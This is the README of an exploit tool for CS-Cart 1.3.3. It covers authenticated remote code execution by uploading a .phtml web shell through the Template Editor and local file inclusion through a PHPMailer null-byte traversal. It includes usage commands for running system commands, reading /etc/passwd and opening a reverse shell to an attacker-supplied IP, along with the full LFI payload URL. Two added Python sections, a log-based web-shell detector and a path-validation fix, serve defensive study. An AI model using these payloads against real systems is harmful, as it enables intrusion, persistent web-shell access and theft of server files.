# cscart-rce-lfi-exploit

Developed by: Strikoder
Tested on: CS-Cart 1.3.3

Multi-purpose exploitation tool for CS-Cart vulnerabilities, covering authenticated remote code execution (RCE) via a Template Editor upload and local file inclusion (LFI) via the PHPMailer class.
## Features

- Authenticated RCE - Upload malicious `.phtml` files through the Template Editor
- Reverse Shell - Multiple methods, including base64-encoded bash, Python, and netcat variants
- Command Execution - Execute a single command or use interactive shell mode
- LFI Exploitation - Read arbitrary files via the PHPMailer class vulnerability
## Installation

Option 1: Git Clone

```bash
git clone https://github.com/strikoder/cscart-rce-lfi-exploit
cd cscart-rce-lfi-exploit
pip3 install requests
```

Option 2: Direct Download

```bash
wget https://raw.githubusercontent.com/strikoder/cscart-rce-lfi-exploit/main/cscart_exploit.py
pip3 install requests
```

## Usage

Execute a single command:

```bash
python3 cscart_exploit.py -t http://target.com -u admin -p admin -c "id"
```

Read a file via LFI:

```bash
python3 cscart_exploit.py -t http://target.com --lfi /etc/passwd
```

Reverse shell:

```bash
# Start listener first
nc -lvnp 443

# Trigger reverse shell
python3 cscart_exploit.py -t http://target.com -u admin -p admin -i YOUR_IP 443
```

## Options

```
-t, --target        Target URL (required)
-u, --username      Admin username (default: admin)
-p, --password      Admin password (default: admin)
-s, --shell-name    Shell filename without extension (default: shell)
-c, --command       Execute single command
-i, --interactive   Reverse shell mode (IP PORT)
--lfi               LFI mode - read file path
```
## How the RCE Works

- Authenticate to `/admin.php` with the provided credentials
- Upload a `.phtml` file to the Template Editor endpoint
- The file is stored in the `/skins/` directory
- Access the shell at `http://target/skins/shellname.phtml?cmd=command`
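From the defender's side, the sequence above leaves a distinctive trace in the web server's access log: a request for a `.phtml` file under `/skins/`, typically carrying a `cmd` query parameter. The following Python is an added detection example, not part of this tool; the log lines are constructed, and it assumes a clean CS-Cart install keeps only Smarty `.tpl` templates and static assets under `/skins/`, so any `.phtml` there is worth an alert.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
# 203.0.113.5 plays the operator of the uploaded shell, 198.51.100.7 a normal visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "POST /admin.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /skins/shell.phtml?cmd=id HTTP/1.1" 200 61 "-" "python-requests/2.31"
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /skins/basic/customer/styles.css HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /skins/shell.phtml HTTP/1.1" 200 0 "-" "curl/8.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)


def classify_request(method: str, url: str) -> Optional[str]:
    """Return an alert label for a suspicious request, or None for benign traffic.

    Assumption: /skins/ holds .tpl templates and static files only, so a .phtml
    served from there is an uploaded script rather than part of the application.
    """
    parts = urlsplit(url)
    path = parts.path.lower()
    if path.startswith("/skins/") and path.endswith(".phtml"):
        # A cmd parameter matches the shell invocation pattern shown above.
        if "cmd" in parse_qs(parts.query):
            return "webshell-command"
        return "phtml-under-skins"
    return None


def scan_log(text: str) -> list:
    """Scan raw log text and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than fail the whole scan
        label = classify_request(m["method"], m["url"])
        if label:
            alerts.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "url": m["url"],
                "status": int(m["status"]),
                "label": label,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Running it against the constructed sample flags the two `.phtml` requests and leaves the stylesheet request alone; the same classifier can be pointed at a real access log by feeding its contents to `scan_log`. The preceding `POST /admin.php` from the same source is not flagged on its own, since legitimate administrators use that endpoint; correlating it with a later `.phtml` hit from the same IP is the stronger signal.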
## LFI Vulnerability

The PHPMailer class includes files based on the `classes_dir` parameter without proper validation:

```
http://target/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../etc/passwd%00
```

The null byte (`%00`) truncates the path and bypasses extension checks.
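The null byte works because older PHP versions handed the include path to a C-string API, so everything after `\x00` (including any extension the code appended) was silently dropped. The Python below is an added illustration, not part of this tool or of CS-Cart: it shows what the effective include path becomes, a detection check for a raw `classes_dir` value, and the kind of validation the include should have performed (reject NUL, resolve the path, require it to stay under the intended directory). The `base_dir` and sample values are constructed.

```python
import os
from typing import Optional
from urllib.parse import unquote


def effective_include_path(raw_param: str, appended_suffix: str) -> str:
    """What a NUL-truncating include would actually open.

    The application appends a fixed suffix (assumed here to be a class filename)
    to the parameter; a NUL in the parameter cuts the string before that suffix.
    """
    full = unquote(raw_param) + appended_suffix
    nul = full.find("\x00")
    return full if nul == -1 else full[:nul]


def is_suspicious_classes_dir(raw_param: str) -> bool:
    """Detection: flag a raw query value that carries traversal, NUL, or an absolute path."""
    decoded = unquote(raw_param)
    segments = decoded.replace("\\", "/").split("/")
    return "\x00" in decoded or ".." in segments or decoded.startswith("/")


def resolve_safely(raw_param: str, base_dir: str) -> Optional[str]:
    """Mitigation: accept the value only if it resolves to a path inside base_dir.

    Returns the resolved absolute path, or None when the value must be rejected.
    """
    decoded = unquote(raw_param)
    if "\x00" in decoded:
        return None  # NUL has no legitimate place in a path component
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # Compare against base + separator so "/srv/cscart2" is not treated as inside "/srv/cscart".
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample values for the classes_dir parameter, not captured traffic.
    samples = [
        "classes/phpmailer",
        "../../../../../../etc/passwd%00",
        "../../../../../../etc/passwd",
        "/etc/passwd",
    ]
    for value in samples:
        print(
            repr(value),
            "opens:", repr(effective_include_path(value, "/class.phpmailer.php")),
            "suspicious:", is_suspicious_classes_dir(value),
            "safe resolution:", resolve_safely(value, "/srv/cscart"),
        )
```

`effective_include_path` makes the page's point concrete: with the null byte present, the appended class filename never reaches the filesystem call, so the request resolves to `/etc/passwd` outside the web root. `resolve_safely` is the shape of fix a defender would want in the include path: even without NUL, a traversal value resolves outside `base_dir` and is rejected, and an allowlist of known class directories would tighten it further.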